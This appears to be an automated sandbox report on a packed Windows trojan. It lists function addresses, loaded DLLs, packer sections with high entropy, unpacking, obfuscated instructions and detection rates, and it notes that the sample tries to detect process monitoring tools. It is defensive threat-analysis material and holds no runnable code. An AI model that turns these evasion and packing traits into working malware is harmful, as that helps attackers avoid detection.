Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00690CBD	0_2_00690CBD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066EC87	0_2_0066EC87
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00610C8C	0_2_00610C8C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005AECA0	0_2_005AECA0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0057CD46	0_2_0057CD46
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00684D7C	0_2_00684D7C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00620D7C	0_2_00620D7C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005DAD6F	0_2_005DAD6F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00658D23	0_2_00658D23
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006C2D23	0_2_006C2D23
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B4D3B	0_2_006B4D3B
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E6D33	0_2_006E6D33
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00668D00	0_2_00668D00
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005F8D28	0_2_005F8D28
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00696DE0	0_2_00696DE0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0069EDFE	0_2_0069EDFE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005FEDC2	0_2_005FEDC2
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EADC0	0_2_005EADC0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E6DFC	0_2_005E6DFC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066EDC5	0_2_0066EDC5
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E0DC9	0_2_006E0DC9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00648DCD	0_2_00648DCD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0063ADCD	0_2_0063ADCD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0065EDAF	0_2_0065EDAF
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0068CDA5	0_2_0068CDA5
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A2DBA	0_2_006A2DBA
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0064ADBF	0_2_0064ADBF
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0068ED8A	0_2_0068ED8A
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D4E51	0_2_005D4E51
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066AE76	0_2_0066AE76
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00688E79	0_2_00688E79
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0061AE78	0_2_0061AE78
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005A6E74	0_2_005A6E74
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0062EE53	0_2_0062EE53
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006CAE58	0_2_006CAE58
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00672E5C	0_2_00672E5C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E8E1E	0_2_005E8E1E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00608E34	0_2_00608E34
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00624E04	0_2_00624E04
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00610E11	0_2_00610E11
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00604E15	0_2_00604E15
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066CE13	0_2_0066CE13
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BAE1D	0_2_006BAE1D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00674E1E	0_2_00674E1E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0062CE1F	0_2_0062CE1F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005AAEC0	0_2_005AAEC0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00642ECA	0_2_00642ECA
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00682EDD	0_2_00682EDD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B8EDD	0_2_006B8EDD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005FEE9E	0_2_005FEE9E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006D6EAC	0_2_006D6EAC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006ACEA9	0_2_006ACEA9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00652E82	0_2_00652E82
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B2E82	0_2_006B2E82
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067EE92	0_2_0067EE92
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A6F6B	0_2_006A6F6B
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005A8F59	0_2_005A8F59
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00572F50	0_2_00572F50
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00590F50	0_2_00590F50
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0069CF78	0_2_0069CF78
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006AAF7E	0_2_006AAF7E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00646F5E	0_2_00646F5E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00662F37	0_2_00662F37
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D2F0B	0_2_005D2F0B
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00636F3F	0_2_00636F3F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E2F2C	0_2_005E2F2C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0061CF1E	0_2_0061CF1E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B0FEF	0_2_006B0FEF
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00676FF8	0_2_00676FF8
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006D8FCF	0_2_006D8FCF
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006EAFDA	0_2_006EAFDA
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00658FD9	0_2_00658FD9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00652FAA	0_2_00652FAA
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E0F89	0_2_005E0F89
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006C6FB6	0_2_006C6FB6
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0062AF87	0_2_0062AF87
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005AEFB0	0_2_005AEFB0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00694F85	0_2_00694F85
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00698F9E	0_2_00698F9E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A8F95	0_2_006A8F95
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00631064	0_2_00631064
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00629041	0_2_00629041
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00661056	0_2_00661056
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006DB05D	0_2_006DB05D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BF05E	0_2_006BF05E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066B05D	0_2_0066B05D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005FD063	0_2_005FD063
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006D302D	0_2_006D302D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005F5014	0_2_005F5014
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00671037	0_2_00671037
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0068B03A	0_2_0068B03A
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00681005	0_2_00681005
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006CF01C	0_2_006CF01C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0060D01D	0_2_0060D01D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D90C6	0_2_005D90C6
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EF0C1	0_2_005EF0C1
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006550FA	0_2_006550FA
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067B0A1	0_2_0067B0A1
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BD0AC	0_2_006BD0AC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EB083	0_2_005EB083
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0061F083	0_2_0061F083
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00679083	0_2_00679083
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A1084	0_2_006A1084
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0060F09D	0_2_0060F09D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00635163	0_2_00635163
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0065116A	0_2_0065116A
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00657176	0_2_00657176
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006FD172	0_2_006FD172
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066F146	0_2_0066F146
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006AB142	0_2_006AB142
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067D153	0_2_0067D153
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0063B120	0_2_0063B120
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D110C	0_2_005D110C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006CB139	0_2_006CB139
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006EB13B	0_2_006EB13B
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0061710C	0_2_0061710C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006C9112	0_2_006C9112
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005991DD	0_2_005991DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005AB1D0	0_2_005AB1D0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006871E3	0_2_006871E3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A11E1	0_2_006A11E1
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006DF1FC	0_2_006DF1FC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005931C2	0_2_005931C2
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006911C0	0_2_006911C0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A51C0	0_2_006A51C0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0065F1D0	0_2_0065F1D0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005F31E3	0_2_005F31E3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B91AB	0_2_006B91AB
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0064F1B2	0_2_0064F1B2
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006031B9	0_2_006031B9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E71B1	0_2_006E71B1
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005791B0	0_2_005791B0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D71A5	0_2_005D71A5
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006D5262	0_2_006D5262
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E5246	0_2_005E5246
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0061924E	0_2_0061924E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00665221	0_2_00665221
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00645229	0_2_00645229
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006AF225	0_2_006AF225
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0069723D	0_2_0069723D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006DB235	0_2_006DB235
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00585220	0_2_00585220
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006372E3	0_2_006372E3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006992E8	0_2_006992E8
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005952DD	0_2_005952DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067F2E8	0_2_0067F2E8
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0065B2F0	0_2_0065B2F0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BB2FC	0_2_006BB2FC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B32DB	0_2_006B32DB
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0058B2E0	0_2_0058B2E0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006852D3	0_2_006852D3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0062D2DD	0_2_0062D2DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0063328C	0_2_0063328C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006D7293	0_2_006D7293
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00683297	0_2_00683297
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D5350	0_2_005D5350
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006C537A	0_2_006C537A
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005AD34D	0_2_005AD34D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E3340	0_2_005E3340
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00663343	0_2_00663343
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BF342	0_2_006BF342
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E5343	0_2_006E5343
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0068135E	0_2_0068135E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005AF330	0_2_005AF330
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005FB332	0_2_005FB332
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00595327	0_2_00595327
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006313E3	0_2_006313E3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006793EB	0_2_006793EB
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006513EB	0_2_006513EB
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006CF3F4	0_2_006CF3F4
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005DF3FE	0_2_005DF3FE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005DD3ED	0_2_005DD3ED
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005F13EC	0_2_005F13EC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0062B3D6	0_2_0062B3D6
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006733D3	0_2_006733D3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E13D6	0_2_006E13D6
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005E13E5	0_2_005E13E5
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006C73D0	0_2_006C73D0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BD3A0	0_2_006BD3A0

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: String function: 00578030 appears 42 times
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: String function: 00584400 appears 65 times

Source: gEfWplq0xQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gEfWplq0xQ.exe	Static PE information: Section: ZLIB complexity 0.997418129280822
Source: gEfWplq0xQ.exe	Static PE information: Section: qplqdpev ZLIB complexity 0.9951797113185976

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@3/1

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Code function: 0_2_005A0C70 CoCreateInstance,

0_2_005A0C70

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gEfWplq0xQ.exe	Virustotal: Detection: 52%
Source: gEfWplq0xQ.exe	ReversingLabs: Detection: 65%

Source: gEfWplq0xQ.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

File read: C:\Users\user\Desktop\gEfWplq0xQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: gEfWplq0xQ.exe

Static file information: File size 1844224 > 1048576

Source: gEfWplq0xQ.exe

Static PE information: Raw size of qplqdpev is bigger than: 0x100000 < 0x19a000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe

Unpacked PE file: 0.2.gEfWplq0xQ.exe.570000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qplqdpev:EW;rbtndpvf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qplqdpev:EW;rbtndpvf:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: gEfWplq0xQ.exe

Static PE information: real checksum: 0x1c7abc should be: 0x1c76d4

Source: gEfWplq0xQ.exe	Static PE information: section name:
Source: gEfWplq0xQ.exe	Static PE information: section name: .idata
Source: gEfWplq0xQ.exe	Static PE information: section name:
Source: gEfWplq0xQ.exe	Static PE information: section name: qplqdpev
Source: gEfWplq0xQ.exe	Static PE information: section name: rbtndpvf
Source: gEfWplq0xQ.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C82ED push 1EEF560Ah; mov dword ptr [esp], ebp	0_2_005C9656
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005CC002 push ecx; mov dword ptr [esp], edi	0_2_005CC010
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C6037 push 268D7B81h; mov dword ptr [esp], ecx	0_2_005C654F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push edi; mov dword ptr [esp], 6D64AA00h	0_2_005EC521
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push 6BF53D0Dh; mov dword ptr [esp], ebx	0_2_005EC5BA
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push eax; mov dword ptr [esp], ebp	0_2_005EC5BE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push edi; mov dword ptr [esp], 0EAC00BCh	0_2_005EC5D3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push 294150B0h; mov dword ptr [esp], esi	0_2_005EC629
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push ebx; mov dword ptr [esp], 143E02E2h	0_2_005EC67F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push 2B45D7C4h; mov dword ptr [esp], edx	0_2_005EC6B6
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push edi; mov dword ptr [esp], ebx	0_2_005EC6C3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push esi; mov dword ptr [esp], ecx	0_2_005EC717
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push edx; mov dword ptr [esp], 4FEB8AA7h	0_2_005EC72E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push ebx; mov dword ptr [esp], esi	0_2_005EC763
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push edi; mov dword ptr [esp], ecx	0_2_005EC76D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028 push ebx; mov dword ptr [esp], 76962640h	0_2_005EC796
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005CA0C2 push edi; mov dword ptr [esp], 64C96A6Bh	0_2_005CA0D9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C60EC push 75CBCE72h; mov dword ptr [esp], edi	0_2_005C60F4
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_007EA0A0 push 67A459F6h; mov dword ptr [esp], edx	0_2_007E9F5A
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067E087 push 67D41689h; mov dword ptr [esp], eax	0_2_0067E0FD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067E087 push esi; mov dword ptr [esp], ebx	0_2_0067E168
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0067E087 push ecx; mov dword ptr [esp], 1AF9F229h	0_2_0067E197
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C80BD push ecx; mov dword ptr [esp], 013C4F3Ah	0_2_005C8243
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C80BD push eax; mov dword ptr [esp], edi	0_2_005C86D3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C80BD push ebp; mov dword ptr [esp], eax	0_2_005C86E3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00734174 push esi; mov dword ptr [esp], 4B667D00h	0_2_007341AE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00734174 push ebx; mov dword ptr [esp], 3425E3B8h	0_2_007341FF
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C8147 push ecx; mov dword ptr [esp], 013C4F3Ah	0_2_005C8243
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C8147 push eax; mov dword ptr [esp], edi	0_2_005C86D3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C8147 push ebp; mov dword ptr [esp], eax	0_2_005C86E3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005C8179 push ecx; mov dword ptr [esp], 013C4F3Ah	0_2_005C8243

Source: gEfWplq0xQ.exe	Static PE information: section name: entropy: 7.9811024458091415
Source: gEfWplq0xQ.exe	Static PE information: section name: qplqdpev entropy: 7.954240130509165

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

